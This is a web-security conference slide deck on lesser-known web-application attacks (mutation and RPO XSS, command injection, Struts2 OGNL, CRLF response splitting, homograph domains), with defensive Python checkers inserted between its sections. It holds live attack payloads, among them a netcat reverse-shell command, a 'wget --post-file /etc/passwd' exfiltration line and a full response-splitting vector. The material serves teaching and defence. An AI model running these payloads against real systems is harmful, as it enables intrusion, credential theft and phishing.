Lesser Known Webapp Attacks
By Ninad Sarang
LesserKnownWebAppAttacks
About me
• Consultant at Aujas Networks
• Part time bug hunter
• Individual Security researcher
• Blogger: http://infinite8security.blogspot.in
Menu Card
Cross site scripting –
• Mutation XSS
• RPO XSS
• Zombie XSS
Remote Command Execution
CR-LF Attack
Homograph Attack

It's all about PoPuP
Cross site Scripting - Mutation XSS
• HTML-encoded payload:
<listing>&lt;img src=1 onerror=alert(1)&gt;</listing>
• We put this piece of code into another piece of code that reads it back through the innerHTML property:
<listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing>
<script>alert(document.getElementById('x').innerHTML)</script>
• When this code executes, the browser calls document.getElementById('x') and reads its innerHTML.
• The result goes through multiple levels of decoding and mutates from a safe (encoded) state to an unsafe (decoded) state.
Mitigation:
Server-side mitigation
• Avoid outputting server content that the browser would otherwise convert incorrectly.
• The flawed content should be replaced with semantically equivalent content that the browser converts properly.
Client-side mitigation
• Browsers should implement ECMAScript 5 or higher.
• TrueHTML: TrueHTML relies on the XMLSerializer DOM object provided by all user agents.
• https://cure53.de/fp170.pdf
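An added check in the spirit of the mitigation above (my own example, not code from the deck or from the cure53 paper): a markup string is only safe if one further round of HTML entity decoding creates no new elements or event handlers. The `<listing>` payload from the slide fails this fixed-point test; both sample inputs are constructed.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs; the first is the mXSS payload shown on the slide.
ENCODED_PAYLOAD = "<listing>&lt;img src=1 onerror=alert(1)&gt;</listing>"
HARMLESS_MARKUP = "<p>Tom &amp; Jerry &lt;3 cartoons</p>"


class TagCollector(HTMLParser):
    """Collects (tag, attribute-names) pairs seen while parsing a markup string."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, tuple(sorted(name for name, _ in attrs))))


def parse_tags(markup):
    """Elements a browser would create from the markup as it stands now."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def mutation_risk(markup):
    """Return the tags that only appear after one extra round of entity decoding.

    Safe content is a fixed point: decoding it once more must not create new
    elements. Anything returned here is markup that a browser quirk (such as
    reading the innerHTML of <listing>) can turn from text into live HTML.
    """
    before = parse_tags(markup)
    after = parse_tags(html.unescape(markup))
    return [t for t in after if t not in before]


def has_event_handler(tag_list):
    """True if any collected tag carries an on* attribute such as onerror."""
    return any(attr.startswith("on") for _, attrs in tag_list for attr in attrs)
```

Run `mutation_risk` on server output before it is stored or emitted; an empty list means the content survives an extra decoding step unchanged, a non-empty list means the browser can mutate it.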
Cross site Scripting - RPO XSS
Relative Path Overwrite XSS
• Difference between absolute and relative URLs
• Absolute URL: https://thehacker.co.in/test
• Relative URL: test/some_subdirectory
To exploit this finding, three things are necessary:
1) Stored XSS that allows CSS injection.
2) URL rewriting.
3) Relative addressing of the CSS style sheet.
Demo
• Step 1: Let's visit www.webdevelopersnotes.com/graphics/index.php3
• To check for URL rewriting, add '/' to the end of the URL.
• Open the rewritten URL with the XSS payload in IE and see the magic ;)
• http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php/
Mitigation:
• It is recommended that absolute URLs be used throughout a site.
• Otherwise, root-relative URLs should be used.
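An added audit script (my own example, not code from the deck or the demo site) that shows why the three preconditions and the mitigation fit together: it resolves every stylesheet href of a page against the normal URL and against the same URL with a trailing '/', and reports the hrefs whose target moves. The page URL reuses the demo's path; the HTML is constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample page; assumed to live at the path used in the deck's demo.
PAGE_URL = "http://www.webdevelopersnotes.com/graphics/index.php3"
SAMPLE_HTML = """
<html><head>
<link rel="stylesheet" href="style.css">
<link rel="stylesheet" href="/graphics/style.css">
<link rel="stylesheet" href="http://static.example.test/site.css">
</head><body><p>graphics</p></body></html>
"""


class StylesheetLinks(HTMLParser):
    """Collects the href of every <link rel="stylesheet"> in a document."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "link" and (a.get("rel") or "").lower() == "stylesheet" and a.get("href"):
            self.hrefs.append(a["href"])


def stylesheet_hrefs(markup):
    parser = StylesheetLinks()
    parser.feed(markup)
    return parser.hrefs


def is_path_relative(href):
    """True when the href's base is the page's own path (no scheme, no host, no leading '/')."""
    parts = urlsplit(href)
    return not parts.scheme and not parts.netloc and not parts.path.startswith("/")


def resolve_all(page_url, markup):
    """Map each stylesheet href to the URL the browser will actually request."""
    return {href: urljoin(page_url, href) for href in stylesheet_hrefs(markup)}


def rpo_exposed(page_url, markup):
    """Stylesheet hrefs whose target moves when the page URL gains a trailing '/'.

    If the server rewrites /index.php3/<anything> back to index.php3, the moved
    target is the page itself, so the page's own HTML is fed to the CSS parser.
    That is the relative path overwrite the deck demonstrates; root-relative and
    absolute hrefs keep a fixed base and are not affected.
    """
    normal = resolve_all(page_url, markup)
    shifted = resolve_all(page_url + "/", markup)
    return [href for href in normal if normal[href] != shifted[href]]
```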
Cross site Scripting - Zombie XSS

Remote/OS Command Execution
www.nsa.gov && nc -vn 192.168.254.128 4444 -e /bin/bash
Now what if ( ; ) is blocked by the application?
• X ; Y = Separating commands (run X and then Y, regardless of the success of X)
• X | Y = PIPE (run X and pass the output of X to Y)
• X ^ Y = PIPEZ
• X && Y = AND (run Y if X succeeded)
• FAIL || Y = OR (run Y if X failed)
• X %0D Y %0D Z = OR
• ` X ` = Backtick
• ` X & Y ` = Background (run Y and then run X in the background, regardless of the success of X)
• $( command )
• nc -e /bin/sh = Netcat
• wget --post-file /etc/passwd = WGET
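An added comparison (my own example, not code from the deck) of three ways an application might guard a "host to ping" parameter: the deck's starting point that blocks only ';', a denylist of every separator listed above applied after URL decoding, and a hostname allowlist feeding an argv list with no shell. The sample values are constructed and use a harmless `id` as the second command.

```python
import re
import subprocess
from urllib.parse import unquote

# Constructed sample values for a "host to ping" parameter. Only the first is
# legitimate; the rest use the separators listed on the slide.
SAMPLES = [
    "www.nsa.gov",
    "www.nsa.gov; id",
    "www.nsa.gov && id",
    "www.nsa.gov | id",
    "www.nsa.gov%0Did",   # URL-encoded carriage return; decoded by the framework before use
    "`id`",
    "$(id)",
]


def naive_filter(value):
    """The deck's starting point: the application only blocks ';'."""
    return ";" not in value


# Every separator from the slide plus the two substitution forms. Decoding first
# matters: %0D is a harmless string until the framework turns it into a real CR.
SHELL_META = re.compile(r"[;|&^`$()\r\n]")


def denylist_filter(value):
    """Better than blocking ';' alone, but still a list that must be kept complete."""
    return SHELL_META.search(unquote(value)) is None


HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def allowlist_filter(value):
    """Positive validation: accept only something shaped like a hostname."""
    return HOSTNAME.match(unquote(value)) is not None


def build_ping_argv(value):
    """Validate, then pass the value as a single argv element; no shell ever sees it."""
    host = unquote(value)
    if not allowlist_filter(host):
        raise ValueError("not a hostname: %r" % host)
    return ["ping", "-c", "1", host]


def run_ping(value):
    """Execute without shell=True, so separators carry no meaning even if validation slips."""
    return subprocess.run(build_ping_argv(value), capture_output=True, text=True, check=False)


def compare_filters(samples=SAMPLES):
    """For each sample: (passes naive filter, passes denylist, passes allowlist)."""
    return {s: (naive_filter(s), denylist_filter(s), allowlist_filter(s)) for s in samples}
```

The naive filter lets six of the seven samples through; the allowlist plus argv list is the only variant that does not depend on knowing every separator the shell understands.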
RCE never dies!!!
Apache Struts2 RCE
• The "action:", "redirect:" or "redirectAction:" prefix is not properly sanitized.
• The information is evaluated as an OGNL (Object-Graph Navigation Language) expression against the value stack, which introduces the possibility of injecting server-side code.
http://host/struts2-blank/example/X.action?action:${3*4}
Demo
Divide and Conquer: CR-LF Attack
• CR stands for Carriage Return (CR, ASCII 13, \r)
• LF stands for Line Feed (LF, ASCII 10, \n)
How does this attack work?
The server script embeds user data in HTTP response headers.
Example:
Step 1: There is a redirection page "redir_lang.jsp". When we hit the index page, the server responds using the following code:
<%
response.sendRedirect("/by_lang.jsp?lang=" + request.getParameter("lang"));
%>
Let's Attack ;)
Step 3: Instead of passing the value "English", let's pass our attack vector as shown:
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
Note: We have URL-encoded the CRLF sequences.
Let's see what the server responds with.
• A first HTTP response, which is a 302 (redirection) response.
• A second HTTP response, which is a 200 response, with content comprising 19 bytes of HTML.
• Superfluous data.
So when the attacker feeds the target with two requests, the first being to the URL
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
and the second to the URL /index.html,
the target would believe that the first request is matched to the first response, and the second request (to /index.html) is matched to the second response.
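An added model of the split described above (my own example, not code from the deck or from the JSP shown): a constructed stand-in for redir_lang.jsp copies the parameter into the Location header, a Content-Length based parser shows that the one reply is read as two responses plus superfluous data, and a header check rejects the value the way a fixed redirect should. The payload is the slide's vector with the header-name hyphens restored.

```python
from urllib.parse import unquote

# The deck's URL-encoded attack vector (Content-Length / Content-Type written out).
PAYLOAD = ("foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a"
           "Content-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>")


def naive_redirect(lang):
    """Constructed model of what redir_lang.jsp emits: the parameter goes straight into Location."""
    return ("HTTP/1.1 302 Found\r\n"
            "Location: /by_lang.jsp?lang=" + lang + "\r\n"
            "Content-Type: text/html\r\n"
            "Content-Length: 0\r\n\r\n")


def parse_responses(raw):
    """Split a stream the way a proxy or browser would: one response per Content-Length.

    Returns (responses, leftover). Each response is (status_line, headers, body);
    leftover is whatever remains that does not begin with a status line.
    """
    responses = []
    while True:
        end = raw.find("\r\n\r\n")
        if end < 0:
            return responses, raw
        head, rest = raw[:end], raw[end + 4:]
        lines = head.split("\r\n")
        if not lines[0].startswith("HTTP/"):
            return responses, raw          # superfluous data, not a response
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", len(rest)))
        responses.append((lines[0], headers, rest[:length]))
        raw = rest[length:]


def split_attack():
    """Run the deck's vector through the naive server and parse what comes back."""
    return parse_responses(naive_redirect(unquote(PAYLOAD)))


def is_header_safe(value):
    """Mitigation: refuse CR or LF in any header value, after decoding the encoded forms."""
    decoded = unquote(value)
    return "\r" not in decoded and "\n" not in decoded


def safe_redirect(lang):
    """The same redirect with the check a fixed redir_lang.jsp should apply."""
    if not is_header_safe(lang):
        raise ValueError("CR/LF in header value")
    return naive_redirect(lang)
```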
What can an attacker do with a CRLF attack?
• Cross site scripting >> http://blog.innerht.ml/twitter-crlf-injection
• Web cache poisoning (defacement)
• Cross-user attacks (single user, single page, temporary defacement)
• Hijacking pages with user-specific information
• Browser cache poisoning
Homograph Attack
Can you tell the difference?
1) https://ebаy.com/
2) https://ebay.com/
What is this all about?
http://ebаy.com/
Converted to punycode:
http://xn--eby-7cd.com/
The "а" in the first URL is a Cyrillic letter, not the Latin "a".
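An added checker (my own example, not code from the deck) that produces the punycode form shown above and flags labels mixing alphabets, the signal that should make a client show the xn-- form rather than the look-alike. The hostnames are constructed; the Cyrillic letter is written as the escape \u0430.

```python
import unicodedata

# Constructed sample hostnames; the first is the deck's look-alike (Cyrillic a, U+0430).
LOOKALIKE = "eb\u0430y.com"
GENUINE = "ebay.com"


def to_punycode(host):
    """The ASCII form of the hostname: each non-ASCII label becomes an xn-- label."""
    return host.encode("idna").decode("ascii")


def script_of(ch):
    """First word of the Unicode character name, e.g. LATIN, CYRILLIC, DIGIT."""
    return unicodedata.name(ch, "UNKNOWN").split()[0]


def scripts_in_label(label):
    return {script_of(c) for c in label if c.isalpha()}


def mixed_script_labels(host):
    """Labels that mix alphabets (LATIN and CYRILLIC here) are the homograph red flag."""
    return [label for label in host.split(".") if len(scripts_in_label(label)) > 1]


def analyze_host(host):
    """Summary a URL filter or mail gateway could log for an incoming link."""
    ascii_form = to_punycode(host)
    return {
        "punycode": ascii_form,
        "is_idn": ascii_form != host,
        "mixed_script_labels": mixed_script_labels(host),
    }
```

The same check is the heart of the IDN display policies in current browsers, which fall back to the xn-- spelling for a label that mixes scripts like this one.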
What can an attacker do with a homograph attack?
• Phishing
• Unvalidated redirection
• Fake websites
• The attacker may combine this with SSL attacks: http://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf
Mitigation
Before / After
Thank You
Reach me @
LinkedIn: Ninad Sarang
Twitter: @hbkninad
